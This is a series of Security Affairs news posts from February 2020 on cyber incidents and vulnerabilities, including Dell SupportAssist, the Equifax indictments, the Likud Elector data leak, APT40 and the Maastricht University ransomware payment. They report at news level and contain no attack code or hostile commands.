IBM’s 2020 X-Force Threat Intelligence Index report analyzes the threat landscape in 2019, the experts observed a spike in the number of OT attacks.

According to IBM X-Force, attacks targeting operational technology (OT) infrastructure increased by over 2000 percent in 2019 compared to 2018, and most of them involved the Echobot malware.

The number of cyber attacks targeting OT infrastructures in 2019 was the greater even observed.

OT attacks hit an all-time high. Malicious activity targeting operational technology assets, most notably industrial control systems (ICS), increased 2000 percent year-over-year in 2019, marking the largest number of attempted attacks on ICS and OT infrastructure in three years.” reads the post published by IBM that introduces the report.

In the OT attacks observed by IBM researchers, hackers attempted to exploit a combination of known ICS/SCADA vulnerabilities, as well as password-spraying attacks.

Experts pointed out that ICS attacks that they have observed were part of two specific campaigns carried out by the Xenotime group and by IBM Hive0016 (APT33).

In June 2019, experts from Dragos firm reported that Xenotime threat actor behind the 2017 Trisis/Triton malware attack was targeting electric utilities in the US and APAC.

“The overlap between IT infrastructure and OT, such as Programmable Logic Controllers (PLCs) and ICS, continued to present a risk to organizations that relied on such hybrid infrastructures in 2019.” continues the report. “The convergence of IT/OT infrastructure allows IT breaches to target OT devices controlling physical assets, which can greatly increase the cost to recover. “

Experts explained that once attacker gained the first foothold on the target network, they used lateral movement to target ICS systems from inside using simple exploitation techniques.

Fortunately, IBM experts had not seen any Echobot attacks that caused disruptions or other serious problems for the affected systems.

Experts from IBM believe that the number of OT attacks will rapidly increase in the next months.

“X-Force expects that attacks against ICS targets will continue to increase
in 2020, as various threat actors plot and launch new campaigns against
industrial networks across the globe.” concludes IBM.

Pierluigi Paganini

(SecurityAffairs – OT, Echobot)

The post OT attacks increased by over 2000 percent in 2019, IBM reports appeared first on Security Affairs.

Dell SupportAssist flaw exposes computers to hack, patch it asap!

Dell addresses a flaw in the Dell SupportAssist Client software that could allow local attackers to execute arbitrary code with Administrator privileges.

Dell released a security update to address a vulnerability, tracked as CVE-2020-5316, in its SupportAssist Client software. The flaw could be exploited by local attackers to execute arbitrary code with Administrator privileges on affected systems.

Dell SupportAssist software is described as a tool that proactively checks the health of system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting.

To solve the problems Dell SupportAssist interacts with the Dell Support website and automatically detect Service Tag or Express Service Code of Dell product.

The utility performs hardware diagnostic tests and analyzes the hardware configuration of the system, including installed device drivers, and is able to install missing or available driver updates.

Dell SupportAssist tool

The software leverages a local web service that is protected using the “Access-Control-Allow-Origin” response header and implementing restrictions to accept commands only from the “dell.com” website or its subdomains,

The SupportAssist software is pre-installed on most of all new Dell computers running Windows OS.

“A locally authenticated low privileged user could exploit this vulnerability to cause the loading of arbitrary DLLs by the SupportAssist binaries, resulting in the privileged execution of arbitrary code. “reads the security advisory published by Dell.

The issue is an uncontrolled search path vulnerability that was reported by the security expert Eran Shimony from Cyberark. The CVE-2020-5316, flaw received a high severity CVSSv3 base score of 7.8.

The vulnerability affects the following Dell versions:

• Dell for business PCs version 2.1.3 or earlier
• Dell for home PCs version 3.4 or earlier.

Dell addresses the issue with the release of Dell SupportAssist for business PCs version 2.1.4, Dell SupportAssist for home PCs version 3.4.1.

Dell users urge to update the Dell SupportAssist software on their systems as soon as possible.

All versions of SupportAssist will automatically install the latest released versions if automatic upgrades are enabled, otherwise the steps for a manual update of the client for home PCs are:

  1. Open SupportAssist.
  2. On the top-right corner of the SupportAssist window, click the ‘Settings’ icon, and then click ‘About SupportAssist’. SupportAssist will automatically check if a newer version of SupportAssist is available.
  • If no update is available, a message indicating that the latest version of SupportAssist is installed are displayed.
  • If a newer version of SupportAssist is available, the ‘Update Now’ link is displayed.
  1. Upon clicking Update Now, the latest version of SupportAssist is downloaded and installed on the system.

For manual update of SupportAssist for business PCs, please refer to the Dell SupportAssist for business PCs deployment guide for deployment instructions.

In May 2019, the security researcher Bill Demirkapi discovered a critical remote code execution vulnerability (CVE-2019-3719) in the Dell SupportAssist utility that could be exploited by hackers to compromise systems remotely.

Demirkapi discovered that it is possible to bypass the protections implemented by Dell and download and execute malicious code from a remote server under the control of the attackers.

Pierluigi Paganini

(SecurityAffairs – hacking, Dell)

The post Dell SupportAssist flaw exposes computers to hack, patch it asap! appeared first on Security Affairs.

Safer internet day – Cybercrime facts Infographic

Dear readers, I decided to create a simple Infographic that shows Cybercrime facts in 2019, I’ve done it for Safer Internet Day 2020.

Enjoy it!

Pierluigi Paganini

(SecurityAffairs – cybercrime, hacking)

The post Safer internet day – Cybercrime facts Infographic appeared first on Security Affairs.

The Altsbit exchange will exit in May following a hack

The Italy-based cryptocurrency exchange Altsbit announced that it has suffered a security breach that led to the theft of its customer’s funds.

Crypto-currency exchange Altsbit recently disclosed a security breach, the company claimed that hackers have stolen almost all its customers’ deposits. 

The Italian cryptocurrency trading firm disclosed the incident on February 5, only a “small part” of customer funds were not stolen because they were stored in cold wallets that are not accessible from the Internet.

Contrary to what initially declared, in an update published by the company, most of the funds were stored in the cold wallets, this means that theoretically they were not stolen and the exchange plans to return them to the customers.

“On February 5, 2020 the exchange Altsbit suffered an attack by hackers, in the attack unfortunately a certain quantity of coins were stolen from the platform. After a careful analysis we managed to understand the stolen quantities, fortunately a good part of the coins were kept on cold storage, these coins will be returned to the users of Altsbit exchange not having the possibility to compensate for these losses, they will be distributed among all users of the platform each coin will have its calculation based on the percentage that was saved during the attack ” reads a statement published by the company.

Unfortunately, Altsbit exchange declared not having the possibility to compensate for the stolen funds, for this reason, lossed will be distributed among all its users.

Altsbit determined that current verified losses are:

  • BTC Lost 6,929 coins out of 14,782 – 7.853 will be returned to users. 53.10% (Refunded)
  • ETH Lost 23,21 out of 32,262 – 9.052 will be returned to users. 28.06% (Refunded)
  • ARRR Lost 3924082 out of 9619754 – 5695672 will be returned to users 59.20% (Refunded)
  • VRSC Lost 414154 out of 852726 – 438572 will be returned to users 51.24% (Refunded)
  • KMD Lost 1066 out of 48015 – 46949 will be returned to users. 97.77% (Refunded)

“The site said users who saw losses must apply for their partial refunds. The bitcoin and ether stolen were valued at around $63,000 at press time.” reported Coindesk.

Altsbit provided instruction to request a partial refund of the available funds, below a step-by-step procedure to follow:

  • login to exchange
  • click on “funding” at the “exchange” page top
  • click on “withdraw”
  • fill the address and sum (pay attention to new balance)
  • fill the verification email or 2FA code
  • click on “withdraw”.

The company announced that it will be terminated on May 8, 2020, after this deadline it will not be possible to receive any refund.

At the time it is not clear who is behind the attack, hacking group @LulzSec has claimed responsibility for the hack.

Some users online speculate that the incident is a coverage for an exit scam.

Pierluigi Paganini

(SecurityAffairs – Altsbit, hacking)

The post The Altsbit exchange will exit in May following a hack appeared first on Security Affairs.

Chinese Military personnel charged with hacking into credit reporting agency Equifax

The United States Department of Justice charged 4 Chinese military hackers with hacking into credit reporting agency Equifax.

The United States Department of Justice officially charged 4 members of the China’s PLA’s 54th Research Institute, a division of the Chinese military, with hacking into credit reporting agency Equifax.

The four members of the Chinese military unit are Wu Zhiyong (吴志勇), Wang Qian (王乾), Xu Ke (许可) and Liu Lei (刘磊), the DoJ’s indictment also states that they have stolen corporate intellectual property (IP) from the company.

equifax chinese hackers

The four men are still at large, residing in China.

In September 2017, Equifax Inc. disclosed a cybersecurity incident that impacted approximately more than 150 million customers. 

According to Attorney General William Barr and FBI Deputy Director David Bowdich, the Equifax data breach is one of the largest hacking case ever uncovered of this type.

“A federal grand jury in Atlanta returned an indictment last week charging four members of the Chinese People’s Liberation Army (PLA) with hacking into the computer systems of the credit reporting agency Equifax and stealing Americans’ personal data and Equifax’s valuable trade secrets.” reads the press release published by the DoJ.

The nine-count indictment alleges that Wu Zhiyong (吴志勇), Wang Qian (王乾), Xu Ke
(许可) and Liu Lei (刘磊) were members of the PLA’s 54th Research Institute, a component of the Chinese military.  They allegedly conspired with each other to hack into Equifax’s computer networks, maintain unauthorized access to those computers, and steal sensitive, personally identifiable information of approximately 145 million American victims.”

The Equifax hack was caused by the exploitation of the CVE-2017-5638 Apache Struts vulnerability. The vulnerability was fixed in March 2017, but the credit reporting agency did not update its systems, the thesis was also reported by an Apache spokeswoman to the Reuters agency.

“They used this access to conduct reconnaissance of Equifax’s online dispute portal and to obtain login credentials that could be used to further navigate Equifax’s network. The defendants spent several weeks running queries to identify Equifax’s database structure and searching for sensitive, personally identifiable information within Equifax’s system,” the DoJ continues.

According to the indictment, the state-sponsored hackers ran approximately 9,000 queries on Equifax’s system obtaining records for nearly half of all American citizens. Exposed data included names, birth dates, and social security numbers.

The hackers attempted to evade detection by routing the traffic through approximately 34 servers located in nearly 20 countries, they used encrypted communication channels within Equifax’s network to hide malicious the malicious traffic and wiped log files on a daily basis.

In July 2019, The Wall Street Journal revealed that Equifax will pay around $700 million to settle with the Federal Trade Commission over the 2017 data breach. The company was also fined £500,000 by the U.K.’s privacy watchdog for failing to take appropriate steps to protect its customers.

“Today’s announcement of these indictments further highlights our commitment to imposing consequences on cybercriminals no matter who they are, where they are, or what country’s uniform they wear,” said FBI Deputy Director David Bowdich.  “The size and scope of this investigation — affecting nearly half of the U.S. population, demonstrates the importance of the FBI’s mission and our enduring partnerships with the Justice Department and the U.S. Attorney’s Office.  This is not the end of our investigation; to all who seek to disrupt the safety, security and confidence of the global citizenry in this digitally connected world, this is a day of reckoning.”

Pierluigi Paganini

(SecurityAffairs – hacking, Equifax)

The post Chinese Military personnel charged with hacking into credit reporting agency Equifax appeared first on Security Affairs.

Netanyahu’s party Elector app exposes data on over 6.5M Israelis

A misconfiguration in the Elector election day app developed by Likud, the Netanyahu’s party might have exposed data on over 6.5 million Israelis.

A misconfiguration in an election day app developed by the Netanyahu’s party Likud, might have exposed personal details of over 6.5 million Israelis.

The incident was reported by the Verizon Media developer Ran Bar-Zik, and Israeli media ([1], [2], [3], [4]) confirmed the data leak.

Bar-Zik explained that he discovered the huge trove of data while was performing a security audit of the Elector app developed by Elector Software for Likud, the Israeli political party led prime minister Benjamin Netanyahu.

elector app israel

“Netanyahu is actually sending Likud activists into a serious security breach, one of the most serious that has been exposed in recent years in Israel.” reads the post published by Calcalist. “Because a major security failure in Elector’s app and system revealed all the Likud’s voter data ahead of the upcoming elections: a huge database of voters and containing up-to-date personal information – ID, full name, address, and phone – of close to 6.5 million Israelis with voting rights.”

At the time it is not clear if the leaked information was accessed also by unauthorized parties before it was discovered.

Bar-Zik decided to assess the app after privacy critics raised by local media in recent weeks.

The Likud app was designed to allow the party’s political supporters to sign up for news and updates during the upcoming Israeli election, on March 2.

The party published the app on the elector.co.il website.

The analysis of the source code of the app revealed the presence of a link to an API endpoint that used to authenticate the site’s administrators.

elector app israel 2

The expert pointed out that the API doesn’t require any authentication to be used to query the application are receive the site’s administrators’s data in cleartext, including their passwords.

Once obtained the credentials, Bar-Zik used them access to the site’s backend, including a database that contained the personal details of 6,453,254 Israeli citizens.

The database was an official and up to date copy of Israel’s voter registration database, which each managed by any party before the election.

“The information includes the ID number, full name, full address, father’s name, ballot and voting address and voter ID – information that actually identifies all the senior citizens of Israel. This information was particularly up-to-date and comprehensive.” continues the post. “Bar Zick himself said that following an apartment move, he updated his address in the Interior Ministry just three weeks ago. His latest address appeared in the uncovered database.”

The records in the database included personal details such as full name, phone number, ID card numbers, home addresses, gender, age, and political preferences.

Following the discovery of the data leak, the official website of the Elector app has been taken down.

Pierluigi Paganini

(SecurityAffairs – Elector app, hacking)

The post Netanyahu’s party Elector app exposes data on over 6.5M Israelis appeared first on Security Affairs.

1.2 million CPR numbers for Danish citizen leaked through tax service

A glitch in the TastSelv Borger tax service has sent over one million Danish CPR numbers to the US companies Google and Adobe.

The Danish Agency for Development and Simplification has discovered the data leak that involved the TastSelv Borger service, which is managed by the US company DXC Technology.

The TastSelv service allows everyone with a tax liability to Denmark to view and change his tax return, annual statement and pay residual tax. 

Data, including CPR numbers, have been exposed for almost five years before the data leak was discovered.

“We take this kind of case very seriously. And of course we need to be able to make sure that our suppliers handle all data according to applicable law and within the framework agreed upon with them.” states the Government Agency.

The good news is that according to the Agency, data was encrypted, it also added that Google and Adobe were not able to see the CPR numbers.

“Google Hosted Libraries have been designed to remove all information that allows identifying users before logging on. Thus, no user information is shared with Google in this process.” Google told the DR News website that first reported the news of the data leak.

Peter Kruse, cyber security expert and founder of the CSIS group, explained that Google had access to 1.2 million Danes’ CPR numbers because they were in plain text.

“The data received by Google is unencrypted. Google has been able to read data in unencrypted form, he estimates.” explained Kruse.

“Google has accessed 1.2 million Danes’ CPR numbers.

The Danish Agency for Development and Simplification attempted to downplay the incident and confirmed that CPR numbers have been encrypted.

DR news website reported that the issue was triggered when logged on users to Tastselv Borger clicked on ‘Correct contact information’.

Once the users have corrected their contact information, an error in the application caused CPR numbers being sent to Google and Adobe as part of a web address. 

DXC has acknowledged the vulnerability and addressed it and confirmed that was not compromised.

“Together with the Development and Simplification Agency, we have addressed potential vulnerabilities. Based on our immediate review, we currently have no reason to believe that data has been compromised. We are continuing to investigate the matter in close cooperation with the Development and Simplification Board.” said DXC.

In 2014, the company CSC (now DXC) was involved in a similar incident that exposed 900,000 CPR numbers.

The Development and Simplification Board has now asked the Attorney General to investigate the incident to clarify the responsibility of DXC Technology.

Pierluigi Paganini

(SecurityAffairs – Data leak, CPR numbers)

The post 1.2 million CPR numbers for Danish citizen leaked through tax service appeared first on Security Affairs.

A sad story of pedophilia on how disgusting images fed the web

The journalist Livio Varriale sheds the light on a story about pedophilia that starts from afar and still today finds its roots in the darker side of the internet.

Today, I’m going to tell you a horrible story that dwells on the dark web, a story about pedophilia that starts from afar and still today finds its roots in the darker side of the internet.

So let’s come to a premise, in the nineties, in a city of Ukraine, a photographic studio was born, it was focused on innocent but at the same time forbidden sites. The story passed over in silence and there are rare traces online. The drama is that on the dark side of the Internet there are ogres that abuse children. This is the story of the LS-Studios, by Alexander Chursin, who had to close his business in 2004 after an FBI raid.

The chronicle tells us that 1500 models, aged between 7 and 14 years, posed for this agency, which fed adult public sites with captivating photos where nudity was not always the height of lust and there were no sexual acts immortalized in the shots.

According to an OSINT research carried out by Matricedigitale, the questionable content is still available online, in the clear web it is possible to find them and it is possible to reach these images with simple searches.

A Twitter user has publicly reported us three links with domains, one of them even .org, which hosts the photos of Ls-Studios. The thing, unfortunately, even more, disgusting is that on Twitter there are still many active links to directories and torrents where you can download GB of images.

Unfortunatelly, it is quite simple to find on social networks like Twitter the links to repositories that host archives of child pornography images

As many as 60 links are still active in 2019, we found several links published via Twitter profiles that explicitly refer to LSMODELS LSSTUDIOS with Tweets written in different idioms, including English, Russian, and Japanese

In conclusion, more than 600,000 photos hosted in the dark web represent a reservoir of pleasure for ogres, in many cases they are available for free, for all those who are attracted to children, but who despise child pornography at the same time. Over time, the models in the pictures have grown up, but their faces have been immortalized and the shots of them still make them legends in the most horrendous part of the internet.

Additional information about the investigation conducted by L Varriare are available at the following links (Italian):

https://www.matricedigitale.it/ricerche_197/post/la-leggenda-di-lsstudios-vive-nel-dark-web-e-non-solo-_778.html

https://www.youtube.com/channel/UCZ9yZFrvFJvrKZEAwNtJ24A?view_as=subscriber

About the author: Livio Varriale

Pierluigi Paganini

(SecurityAffairs – child pornography, pedophilia)

The post A sad story of pedophilia on how disgusting images fed the web appeared first on Security Affairs.

Malaysia’s MyCERT warns cyber espionage campaign carried out by APT40

Malaysia’s MyCERT issued a security alert to warn of a hacking campaign targeting government officials that was carried out by the China-linked APT40 group.

Malaysia’s Computer Emergency Response Team (MyCERT) warns of a cyber espionage campaign carried out by the China-linked APT40 group aimed at Malaysian government officials.

The attackers aimed at stealing confidential documents from government systems after having infected them with malware.

MyCERT observed an increase in number of artifacts and victims involving a campaign against Malaysian Government officials by a specific threat group.” reads the alert issued by MyCERT. “The group motives is believe to be  data theft and exfiltration.”

The attackers used spear-phishing messages sent to government officials, they posed as a journalist, an individual from a trade publication, or individuals from a relevant military organization or non-governmental organization (NGO).

The messages contained links to weaponized Office documents stored on Google Drive. Once the documents are opened and the victims have enabled the macros, the dropper is executed.

The attackers exploit the CVE-2014-6352 and CVE-2017-0199 Office vulnerabilities to drop and execute the malware on the victim’s computer.

“The group’s operations tend to target government-sponsored projects and take large amounts of information specific to such projects, including proposals, meetings, financial data, shipping information, plans and drawings, and raw data,” continues MyCERT.

It is not clear if the attackers have exfiltrated sensitive documents from government officials.

The advisory doesn’t explicitly attribute the campaign to the Chinese APT, but references included in the alert point to the APT40 hacking group.

The cyber-espionage group tracked as APT40 (aka TEMP.PeriscopeTEMP.Jumper, and Leviathan), apparently linked to the Chinese government, is focused on targeting countries important to the country’s Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).

APT40

Experts believe that APT40 is a state-sponsored Chinese APT group due to its alignment with Chinese state interests and technical artifacts suggesting the actor is based in China.

The APT40 group has been active since at least 2013 and appears to be focused on supporting naval modernization efforts of the Government of Beijing. Threat actors target engineering, transportation, and defense sectors, experts observed a specific interest in maritime technologies.

The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry.

The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.

In January, a group of anonymous security researchers that calls itself Intrusion Truth has discovered that the APT40 uses 13 front companies operating in the island of Hainan to recruit hackers.

Intrusion Truth did not associate the group from Hainan with a specific Chinese APT group, but FireEye and Kaspersky researchers believe that the China-linked group is the APT40 (aka TEMP.PeriscopeTEMP.Jumper, and Leviathan).

Pierluigi Paganini

(SecurityAffairs – APT40, China)

The post Malaysia’s MyCERT warns cyber espionage campaign carried out by APT40 appeared first on Security Affairs.

A cyber-attack on major banks could trigger a liquidity crisis, ECB President Christine Lagarde warns

The president of the European Central Bank (ECB), Christine Lagarde, is warning that a cyber-attack on a major financial institution could trigger a liquidity crisis.

The president of the European Central Bank (ECB), Christine Lagarde, has warned that a coordinated cyber-attack on major banks could trigger a liquidity crisis.

President Lagarde cited findings of a report by the European Systemic Risk Board (ESRB) that estimate the global cost of cyber attacks at between $45bn and $654bn.

Lagarde warns that operational outages that encrypted or destroyed balance accounts at a major bank could trigger a liquidity crisis.

“As an operator of critical infrastructures, the ECB obviously takes such threats very seriously,” Lagarde said in France on Wednesday evening.

“History shows that liquidity crises can quickly become systemic crises,” she added. “The ECB is well aware that it has a duty to be prepared and to act pre-emptively.”

ECB

President Lagarde remarked that global risks are linked, a concept is yearly illustrated in the report published by the World Economic Forum.

Below two eloquent graphs included in the Global Risks Report 2020 that show that the risk of cyber-attack has a high likelihood and a high impact.

The second graph shows the strict link between the risk of cyber attacks and other risks such as “Critical infrastructure failure” and “Social instability Social instability,” and “Fiscal crises.”

At a recent board meeting, the European Systemic Risk Board (ESRB)  warned that cyber warfare represents a major source of risk to the financial system.

“Last year, the G7 announced a joint cross-border crisis management exercise on a cyber incident affecting the financial system that it carried out in June 2019, saying that cyber risks were increasing and posed a “genuine and growing threat” to the stability and integrity of the financial sector.” reported the Independent. “It was the first exercise of its kind to be by finance ministries, central banks, regulators and financial market authorities. It did not reveal the the G7 asked its Cyber Experts Group to review financial regulation, and to look at whether the impacts could be measured better.”

Last week, the European Central Bank has published the European framework for testing financial sector resilience to cyber attacks.

The framework aims to simulate the effects of cyber attacks on critical systems in the banking industry in the European Union.

The move is the response to the numerous cyberheists that hit the financial industry in the past years, like the attacks against the SWIFT system and the assault against online and mobile services at the Netherlands’ three top banks.

European Central Bank framework

The framework also includes the involvement of “red teams” for vulnerability assessments and penetration tests of systems used by companies in the financial sector.

“The European Central Bank (ECB) today publishes the European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU), which is the first Europe-wide framework for controlled and bespoke tests against cyber attacks in the financial market.” reads the announcement published by the ECB.

“The TIBER-EU framework facilitates a harmonised European approach towards intelligence-led tests which mimic the tactics, techniques and procedures of real hackers who can be a genuine threat. TIBER-EU based tests simulate a cyber attack on an entity’s critical functions and underlying systems, such as its people, processes and technologies. This helps the entity to assess its protection, detection and response capabilities against potential cyber attacks.”

In May 2018, the European Central Bank (ECB) published the European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU), which is the first Europe-wide framework for controlled and bespoke tests against cyber attacks in the financial market.

The main goal for the Framework is to facilitate testing for cross-border entities under oversight of several authorities, it aims to help organizations measure their ability in detecting and responding cyber attacks.

The instructions on how to “How to implement the European framework for Threat Intelligence-based Ethical Red Teaming” are available here.

In August 2019, the European Central Bank (ECB) announced that threat actors had access for months to the contact information of hundreds of financial industry subscribers to its newsletter.

The good news is that the BIRD website was run on an external server that is separated from the ECB infrastructure, according to the bank neither internal systems nor market-sensitive data were affected.

Pierluigi Paganini

(SecurityAffairs – ECB, Saudi Arabia)

The post A cyber-attack on major banks could trigger a liquidity crisis, ECB President Christine Lagarde warns appeared first on Security Affairs.

Massive DDoS attack brought down 25% Iranian Internet connectivity

Iran comes under cyber-attack again, a massive offensive brought down a large portion of the Iranian access to the Internet.

Iran infrastructures are under attack, a massive cyberattack brought down a large portion of the Iranian access to the Internet, according to the experts the national connectivity fell to 75%.

The NetBlocks internet observatory, which tracks disruptions and shutdowns, observed yesterday (February 8, 2019) a massive outage of the country’s connectivity to the Internet

According to NetBlock, the connectivity issue was observed after the Iranian Government has deployed the “Digital Fortress” (also known as D DEZHFA/Dejfa) which is the national cyber shield.

“Network data from the NetBlocks internet observatory confirm extensive disruption to telecommunication networks in Iran on the morning of Saturday, 8 February 2020 lasting several hours.” reads a post published by NetBlocks.

“Network data show a distinct fall in connectivity with several of Iran’s leading network operators from approximately 11:45 a.m. local time (08:15 UTC) affecting cellular and fixed-line operators. Partial recovery was observed one hour after the initial shutdown but other networks returned some seven hours after the incident onset. National connectivity fell to a low point of 75% of ordinary levels for a period during the morning.”

In December 2019, the Iranian telecommunications minister Mohammad Javad Azari Jahromi, announced that the Islamic Republic had recently thwarted a “highly organized cyber attack” targeting its government infrastructure.

In October 2019, addressing the Munich Security Conference (MSC) Cyber Security Summit in Qatar, Azari Jahromi said his country’s cybersecurity project codenamed Digital Fortress (Dejfa) deterred 33 million cyberattacks in 2018.

According to the experts, the Internet outage suffered yesterday by Iran had impacted some network operators. ICT ministry officials confirmed that the Digital Fortress system repelled a Distributed Denial of Service (DDoS) attack.

Technical data confirm that networks were disabled while the country’s infrastructures were under attack.

A spokesperson for Iran’s Telecommunication Infrastructure Company, confirmed via Twitter that a DDoS attack had been “normalized” with the “intervention of the Dzhafa Shield.”

While NetBlocks pointed out that the observation is consistent with a targeted disruption, the Financial Tribune revealed that there is no evidence that the attack was launched by a nation-state actor.

“No sign of state sponsorship of the attack has been detected yet.” Bonabi told Financial Tribune.

“The attack’s sources and destinations were highly distributed. Spoofed source IPs from East Asia and North America were used in the DDoS attack,”

Iran has faced multiple network disruptions in recent months, in some caused the problems were caused by internal factors.

In December Iran telecommunications minister announced that for the second time in a week it has foiled a cyber attack against its infrastructure.

In November 2019, after the announcement of the government to cut fuel subsidies, protests erupted in Iran and the authorities blocked access to the internet to prevent the spreading of news, videos, and images online.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Massive DDoS attack brought down 25% Iranian Internet connectivity appeared first on Security Affairs.

The number of cyber attacks on Saudi Aramco is increasing

Saudi Aramco, the Saudi Arabian national petroleum and natural gas company, revealed that it has seen an increase in attempted cyber attacks since the Q4 2019.

The energy industry is under attack, Saudi Aramco announced it has seen an increase in attempted cyber attacks since the final quarter of 2019. The data is alarming, even if the petroleum giant confirmed to have successfully countered them.

“Overall there is definitely an increase in the attempts of (cyber) attacks, and we are very successful in preventing these attacks at the earliest stage possible,” Khalid al-Harbi, Saudi Aramco chief information security officer, told Reuters in a telephone interview.

“The pattern of the (cyber) attacks is cyclical, and we are seeing that the magnitude is increasing, I would suspect that this will continue to be a trend.”

Al-Harbi expressed concerns about the growing trend and for the increase of the magnitude of the attacks. Saudi Arabia’s energy sector has been the target of several cyber attacks in the past.

In August 2012, more than 30,000 systems at Saudi Aramco were infected with the Shamoon malware.

Saudi Aramco

On December 2016, security experts observed a new wave of attacks leveraging on the Shamoon malware. The malware experts from Palo Alto Networks and Symantec both reported an attack on a single Saudi company.

The new variant of Shamoon, so-called Shamoon 2, can rewrite the MBR on affected computers with an image of a three-year-old Syrian boy named Alan Kurdi that lay dead on a Turkish beach.

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

In January 2017, researchers at Palo Alto Networks discovered a new strain of the Shamoon 2 malware that was targeting virtualization products.

The researchers at IBM’s X-Force Incident Response and Intelligence Services (IRIS) believe Shamoon malware is a pivot element in information warfare between Saudi Arabia and Iran.

The malware experts identified servers used to deliver Shamoon, they have broken onto the server used by the attackers and gathered more information to study the threat and its attack chain.

In December 2017, security firms FireEye and Dragos reported the discovery of a new strain of malware dubbed Triton (aka Trisis) specifically designed to target industrial control systems (ICS).

Both FireEye and Dragos would not attribute the Triton malware to a specific threat actor, they only revealed that it has been used in attacks aimed at an unnamed critical infrastructure organization and caused a shutdown at a critical infrastructure organization somewhere in the Middle East.

Experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

Saudi Aramco is one of the most important oil supply worldwide, its production covers 10% of the global oil supply.

Harbi also revealed that Saudi Aramco personnel was targeted with an Emotet campaign, but let me add that in this case there are no public news of a targeted attack employing the popular malware that has been distributed globally via malspam campaigns.

Harbi highlighted the difficulty in attributing the attack to a specific threat actor.

Pierluigi Paganini

(SecurityAffairs – Saudi Aramco, Saudi Arabia)

The post The number of cyber attacks on Saudi Aramco is increasing appeared first on Security Affairs.

Security Affairs newsletter Round 250

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Microsoft announces the launch of a bug bounty program for Xbox
Microsoft warns TA505 changed tactic in an ongoing malware campaign
Russias watchdog Roskomnadzor threatens to fine Twitter and Facebook
The Russian Government blocked ProtonMail and ProtonVPN
Apollon Darknet market is allegedly pulling an exit scam
Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks
Police are warning crooks are using cleaners to compromise businesses
Ransomware brought down services of popular TV search engine TVEyes
Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root
Facebook fixed a WhatsApp bug that allowed hackers to access local file system
Hackers abused Twitter API to match usernames to phone numbers
NCA arrested six men in UK over Malta Bank Cyber-Heist
The city of Racine was offline following a ransomware attack
Toll Group shuts down some online systems after ransomware attack
Using 99 mobile phones to create a fake traffic jam in Google Maps
Dropbox paid more than $1 Million via its bug bounty program
Expert released PoC exploit code for unpatched backdoor in HiSilicon chips
Google mistakenly shared private videos of some users with others in 2019
Hackers abuse BitBucket to infect 500K+ hosts with arsenal of malware
Microsoft detects 77,000 active web shells on a daily basis
cdpwn – Millions of devices at risk due to flaws in implementations of Cisco Discovery Protocol (CDP)
Hacking Wi-Fi networks by exploiting a flaw in Philips Smart Light Bulbs
Critical Android Bluetooth flaw CVE-2020-0022 could be exploited without user interaction
Iran-linked APT group Charming Kitten targets journalists, political and human rights activists
Japanese defense contractors Pasco and Kobe Steel disclose security breaches
Facebooks official Twitter and Instagram accounts hacked by OurMine
Group-IB detects Half a Million Indian Banks Cards on Jokers Stash Cardshop
IoT devices at major Manufacturers infected with crypto-miner
RobbinHood ransomware exploit GIGABYTE driver flaw to kill security software

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 250 appeared first on Security Affairs.

Maastricht University finally paid a 30 bitcoin ransom to crooks

In December, Maastricht University was hit with ransomware attack, now the university admitted to have paid the ransom requested by crooks.

In December 2019, Maastricht University (UM) announced that ransomware infected almost all of its Windows systems on December 23.

Maastricht University is an excellent university attended by over 18,000 students, roughly 4,400 employees, and 70,000 alumni.

“Maastricht University (UM) has been hit by a serious cyber attack. Almost all Windows systems have been affected and it is particularly difficult to use e-mail services.” stated a notice published by the UM in December. “UM is currently working on a solution. Extra security measures have been taken to protect (scientific) data. UM is investigating if the cyber attackers have had access to this data.”

At the time the university did not reveal details of the attack or family of ransomware that infected its systems. It is unclear if the attackers have exfiltrated data from the systems before encrypting them.

Now the university (UM) admitted to have paid a ransom of 30 bitcoin requested by the attackers.

“Since the cyber attack on 23 December 2019, UM has been working hard: on the one hand, to repair the damage and, on the other hand, to make education and research possible again as soon as possible.” read a management summary of the Fox-IT report and UM’s response.

“Part of our technical infrastructure was affected during the attack. That infrastructure consists of 1,647 Linux and Windows servers and 7,307 workstations. The attack ultimately focused on 267 servers of the Windows domain. The attacker focused on encrypting data files in the Windows domain. The backup of a limited number of systems was also affected.”

Now all critical systems at the University are online and offline backups were secured by the company.

According to security experts at Fox-IT, the ransomware attack is compatible with other attacks carried out by the TA505 cybercrime gang.

“The modus operandi of the group behind this specific attack comes over with a criminal group that already has one has a long history, and goes back to at least 2014,” reads the Fox-IT full report to UM (in Dutch).

TA505 hacking group has been active since 2014 focusing on Retail and banking sectors. The group is also known for some evasive techniques they put in place over time to avoid the security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legit programs regularly used by victim, or also the abuse of valid cryptographically signed payloads.

The TA505 group was involved in campaigns aimed at distributing the Dridex banking Trojan, along with LockyBitPaymerPhiladelphiaGlobeImposter, and Jaff ransomware families.

Security experts from cyber-security firm Prevailion reported that TA505 has compromised more than 1,000 organizations.

Recently Microsoft warned that TA505 changed tactic in an ongoing malware campaign

Fox-IT experts believe that TA505 hackers compromised the university’s systems via phishing messages, at least two malicious e-mails were opened on two UM systems on October 15 and 16.

The attackers gained admin rights on an unpatched machine until November 21 and used lateral movements to infect as much system as possible with the Clop ransomware.

After careful analysis of the possibilities, on December 30, the Maastricht University paid the ransom to decrypt its files.

UM acquired the ransomware decryptor by paying a 30 bitcoin ransom (roughly $220,000 or €220,000).

